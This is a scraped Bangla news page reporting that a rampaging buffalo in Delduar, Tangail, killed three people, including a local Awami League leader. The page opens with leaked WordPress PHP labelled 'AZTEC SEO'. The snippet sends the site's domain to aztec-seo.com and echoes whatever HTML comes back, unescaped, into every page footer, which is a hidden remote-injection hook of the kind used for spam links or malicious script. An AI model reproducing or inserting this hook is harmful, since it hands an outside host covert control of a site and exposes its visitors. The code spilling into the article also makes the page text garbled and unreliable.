/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); পাগলা মহিষের আক্রমণে আ.লীগ নেতাসহ ৩ জনের মৃত্যু | Dhaka Sky News

ডিসি সম্মেলনের উদ্বোধন করলেন প্রধানমন্ত্রী শেখ হাসিনা

আগের সংবাদ

বিশ্বব্যাংকের সহযোগিতা চায় বিজিএমইএ

পরের সংবাদ

পাগলা মহিষের আক্রমণে আ.লীগ নেতাসহ ৩ জনের মৃত্যু

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: January 24, 2023 , 11:06 am

টাঙ্গাইলের দেলদুয়ার উপজেলায় একটি পাগলা মহিষের আক্রমণে আওয়ামী লীগের নেতাসহ ৩ জন নিহতে হয়েছেন। তারা হলেন উপজেলার লাউহাটি ইউনিয়ন আওয়ামী লীগের সভাপতি হাসমত আলী খান, কিতাব আলী ও হাজেরা বেগম। তাঁরা তারুটিয়া গ্রামের বাসিন্দা।

২৩ জানুয়ারি সোমবার রাত পৌনে ৯টার দিকে সাভারের এনাম মেডিকেল কলেজ হাসপাতালে হাসমত আলী এবং রাত সাড়ে ৯টার দিকে টাঙ্গাইল জেনারেল হাসপাতাল থেকে উন্নত চিকিৎসার জন্য ঢাকায় নেওয়ার পথে কিতাব আলীর মৃত্যু হয়। এর আগে গত রোববার সকালে হাজেরা বেগমের মৃত্যু হয়।

দেলদুয়ার থানার ওসি নাসির উদ্দিন মৃধা জানান, রোববার সকালে তারুটিয়া গ্রামের সাধারণ মানুষের ওপর আক্রমণ চালায় পাগলা মহিষটি। এ সময় অন্তত ১০ জন আহত হন। আহত ব্যক্তিদের উদ্ধার করে বিভিন্ন হাসপাতালে চিকিৎসার জন্য পাঠানো হয়।

বিষয়: